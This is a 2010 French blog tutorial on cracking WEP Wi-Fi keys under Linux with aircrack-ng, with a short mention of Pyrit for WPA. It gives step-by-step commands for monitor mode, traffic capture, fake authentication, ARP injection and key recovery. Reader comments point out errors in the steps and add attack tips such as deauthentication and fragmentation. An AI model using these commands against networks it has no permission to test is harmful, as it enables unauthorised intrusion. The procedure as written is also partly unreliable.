Auteur:
NicoLargo
Date:
17/02/2010
Catégories:
Open-source
Reseau
Web
Tags:
aircrack-ng
hack
securité
wep
wifi
Cracker un réseau Wifi sous GNU/Linux
Les réseaux Wifi envahissent notre quotidien. Force est de constater les techniques de protection de ces réseaux ont fait un bon en avant ces dernières années: WEP, WPA, WPA2… Cependant, il existe des solutions logicielles pour contourner ces protections. Nous allons en aborder quelques unes dans ce billet.
Attention: Je décline toute responsabilité concernant l’usage de ce tutoriel par des personnes mal intentionnées. Je vous rappelle qu’il est formellement interdit de s’introduire sur un réseau sans l’accord de son propriétaire. Si vous souhaitez tester cette procédure, il est donc conseillé de le faire sur votre réseau Wifi et pas sur celui du voisin 
Crack de réseau Wifi WEP avec AirCrack-NG
Le principe est de capturer du trafic Wifi puis d’analyser le contenu de la capture pour y trouver le mot de passe WEP. Nous allons utiliser la suite logicielle AirCrack-NG (disponible sous GNU/Linux et Windows).
Installation de Aircrack-NG
Sur une distribution GNU/Linux Ubuntu, l’installation se résume à la ligne de commande suivante:
sudo aptitude install aircrack-ng
Capture du trafic Wifi
On commence par activer le “monitoring” sur l’interface Wifi (wlan0) dans mon cas:
sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 4965/5xxx iwlagn - [phy0] (monitor mode enabled on mon0)
Cette première commande va créer l’interface virtuelle mon0, sur laquelle on va capturer le trafic Wifi. Avant de lancer la capture, il faut sélectionné le channel ID (réseau Wifi):
sudo airodump-ng mon0
Cette commandes va afficher les réseau Wifi disponibles:
CH 10 ][ Elapsed: 16 s ][ 2010-01-12 14:18
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:80:48:4F:2E:C4 -55 28 0 0 1 54 . OPN WifiDeTest
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:22:FA:FE:B5:6E -72 0 - 1 30 10 On peut voir que le réseau (ESSID) WifiDeTest est associé au channel (CH) 1 avec l'adresse MAC (BSSID) 00:80:48:4F:2E:C4. Notre PC effectuant l'attaque à comme addresse MAC (STATION) 00:22:FA:FE:B5:6E.
On peut ensuite capturer le trafic de ce channel spécifique, le résultat de la capture sera enregistré dans un fichier dont le préfixe commencera par dump:
sudo airodump-ng --encrypt WEP -c 1 -w dump -i mon0
Injection de trafic dans le réseau
Afin d'accélérer la phase précédente, il est judicieux d'injecter du trafic afin que la capture ait une taille conséquente. Les actions suivantes sont donc à faire en parallèle de la capture (c'est à dire dans un autre terminal).
Nous allons dans un premier temps générer une attaque de type "fake authentification" sur le routeur Wifi. Cette étape est seulement nécessaire si un filtrage par @MAC est actif.
aireplay-ng -1 0 -e WifiDeTest -a 00:80:48:4F:2E:C4 -h 00:22:FA:FE:B5:6E
La syntaxe est la suivante:
aireplay-ng -1 0 -e ESSID -a BSSID -h STATION
On passe ensuite à l'injection du trafic, étape indispensable de ce hack:
aireplay-ng -3 -e WifiDeTest -a 00:80:48:4F:2E:C4 -h 00:22:FA:FE:B5:6E
Le résultat est un fichier dump-01.cap. Plus la capture sera longue (et donc ce fichier gros), plus Aircrack-NG aura de chance de cracker le mot de passe WEP. La documentation conseille une taille minimum de 500 Ko (il suffit de faire des "ls -alF" dans le répertoire pendant que la commande précédente tourne pour voir la taille du fichier). Quand vous voulez arrêter la capture, faire un CTRL-C dans la fenêtre.
Analyse du dump
On se retrouve donc avec un fichier dump-01.cap de 500 Ko ou plus. Pour en faire l'analyse et trouver le mot de passe WEP, il faut utiliser la commande:
aircrack-ng -b 00:80:48:4F:2E:C4 dump-01.cap
Ou 00:80:48:4F:2E:C4 est à remplacer par l'adresse BSSID fourni par la commande "sudo airodump-ng mon0".
On arrive au résultat suivant:
... Key found: [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ] Probability 100%
Il ne reste plus qu’à ce connecter “normalement au réseau WEP en utilisant cette clés !
Enfin on arrête le monitoring de l’interface:
On commence par activer le “monitoring” sur l’interface Wifi (wlan0) dans mon cas:
sudo airmon-ng stop wlan0
Conclusion
Comme vous pouvez le voir il est vraiment facile de cracker un réseau Wifi WEP, je vous conseille donc de ne pas utiliser ce type de protection sur votre réseau domestique et encore moins professionnel.
Crack de réseau Wifi WPA/WPA2 avec Pyrit
Contrairement à WEP, WPA et WPA2 demande beaucoup plus de ressource avant d’être cracker. C’est dans cette optique que le projet Pyrit a vu le jour: proposer un algorithme de crack des ce type de réseau Wifi en utilisant la puissance de votre GPU.
Voici une petit démonstration en vidéo:
Pour une procédure complète qui mélangent l’utilisation de AirCrack-NG (pour la capture et le filtrage du réseau à cracker) et Pyrit pour le hack par “brute-force”, je vous conseille la lecture de ce forum ou de ce billet.
Twitter: 
Rss:
10 commentaires
@Edouard: effectivement cela pique un peu les yeux… (corrigé)
“il est judicieux d’injecter du trafic afin que la capture aie une taille conséquente” -> il est judicieux d’injecter du trafic afin que la capture ait une taille conséquente
et sinon sympa le comm
Parfois c’est contrôlé par huissier (UFC 26/05/2008) :
http://www.ecrans.fr/IMG/pdf/Constat-ufc-que-choisir-wifi.pdf
Merde la honte…
Il est regrettable de laisser croire que WPA est crackable simplement car ce n’est pas DU TOUT encore la réalité !
Un site intéressant sur les enjeux, les méthodes, les trucs autour de la sécurité en Wifi est celui de Cedric Blanchard : http://sid.rstack.org/blog/index.php/ (je n’en suis pas l’auteur).
De plus, la citation du site crack-wpa.fr est particulièrement maladroite car ce site est très mauvais :
- il laisse croire par des tutos très “basic” que l’on peut cracker des spots wifi y compris WPA ce qui est faux.
- il propose, moyennant finance, des pseudos dictionnaires parfaitement inutiles ce qui est à la limite de l’escroquerie.
- j’ai fourni, sur un site, un algorithme qui au contraire de ces pseudos dictionnaires est capable de générer la totalité des clés mais j’ai ajouté que c’était totalement inopérant compte tenu du temps nécessaire à l’exécution !
Bref, casser du WEP est aisé, laisser croire que l’on peut faire de même avec WPA n’est pas honnête ! D’autant qu’il suffit de passer à AES au lieu de TKIP dans le cas de WPA-PSK pour repousser un peu plus la difficulté.
On peut aussi laisser tourner la capture (airodump) et dans le même temps lancer aircrack sur le fichier de la capture. Comme ça si le fichier ne contient pas assez d’informations, on a a pas besoin de relancer la capture avec airodump. On peut même faire un script qui lancerait aircrack toutes les minutes par exemple sur le fichier capturé.
Wep c’est bien mais ce n’est valable que sur le WEP ce qui se fait aujourd’hui bien plus aisément que ta méthode (il existe des soft qui sont automatique sous GNU/Linux -FeedingBottle). Et pour le WPA c’est tout simplement quasiment impossible sauf si le mot de passe est définit comme sur cette vidéo.
Utiliser les ressources du GPU oui mais il faut faire bosser beaucoup plus de PC que ça pour cracker un réseau protégé en WPA. Il faut passer par du collaboratif et encore.
‘Soir!
Cracker du wep n’est pas aussi facile qu’il n’y paraît… Votre test est effectué dans des conditions optimum, à 3 mètres d’une box et de son client, il fausse la réalité.
Le wifi comme le bluetooth est très sensible aux obstacles: mur en béton armée, métaux divers. Ils sont aussi très sensibles aux aléas du climat: pression atmosphérique, taux d’humidité, neige, pluie. Un beau temps sec est idéale!
La distance entre vous et cette AP est à prendre en compte, elle pourra rendre la communication instable, voir impossible dans un sens mais pas dans l’autre, vous captez l’AP mais pas lui, et pas plus que son traffic wifi! En effet la puissance d’émission électromagnétique du matériel utilisé joue dans les deux sens.
Ajoutez le paramètre temps, car attaquer un AP peut demander un certain temps, désactiver le filtrage mac aussi, trouver les routes réseaux aussi. Passer le serveur radius encore un certain temps… (Prévoir sacs de couchages et nourritures)
Mais où est le client et son traffic wifi vers ‘AP dans votre test, avant l’attaque ??? Votre test “no client” (sans client) me parait un peu trop facile… C’est quoi la marque de votre AP qu’on ne l’achète pas !?
/Nexus6
–
!?
Je rejoins Nexus sur ses interrogations. L’attaque d’un accès WEP sans client est certes possible, mais c’est loin d’être le plus facile et, surtout, ça nécessite quelques étapes supplémentaires pour stimuler la génération de trafic par le réseau, typiquement un chopchop ou une attaque par fragmentation pour injecter un packet ARP forgé. C’est loin d’être simple, et ça demande quelques hypothèses sur la configuration du réseau.
Sinon, il y a d’autres coquilles. Par exemple, il est écrit :
“Notre PC effectuant l’attaque à comme addresse MAC (STATION) 00:22:FA:FE:B5:6E”
La fake authentication est réalisée sur cette adresse @MAC, avec la mention :
“Cette étape est seulement nécessaire si un filtrage par @MAC est actif”
C’est faux. Non seulement cette étape est *nécessaire* pour injecter du trafic, sinon il sera refusé parce que venant d’une @MAC non associée (à moins d’utiliser la MAC d’un client déjà associé, mais vous n’en avez pas), mais en plus, si du filtrage par @MAC est effectivement configuré, alors ça va échouer puisque l’adresse proposée est celle de la station attaquante, donc pas une adresse autorisé a priori.
De plus, l’attaque qui est décrite ici concerne un accès avec une station légitime présente. Il manque par contre une étape de désauthentification pour forcer l’émission de requête ARP par la station client.
Enfin, il n’est pas nécessaire d’arrêter la capture pour lancer aircrack-ng. Celui-ci fonctionne très bien sur une capture en cours de constitution, ce qui permet d’aller se faire un bol de Chocapics en attendant.
Salut, je voudrais juste te remercier pour tout ce travail que tu fais
Bonne continuation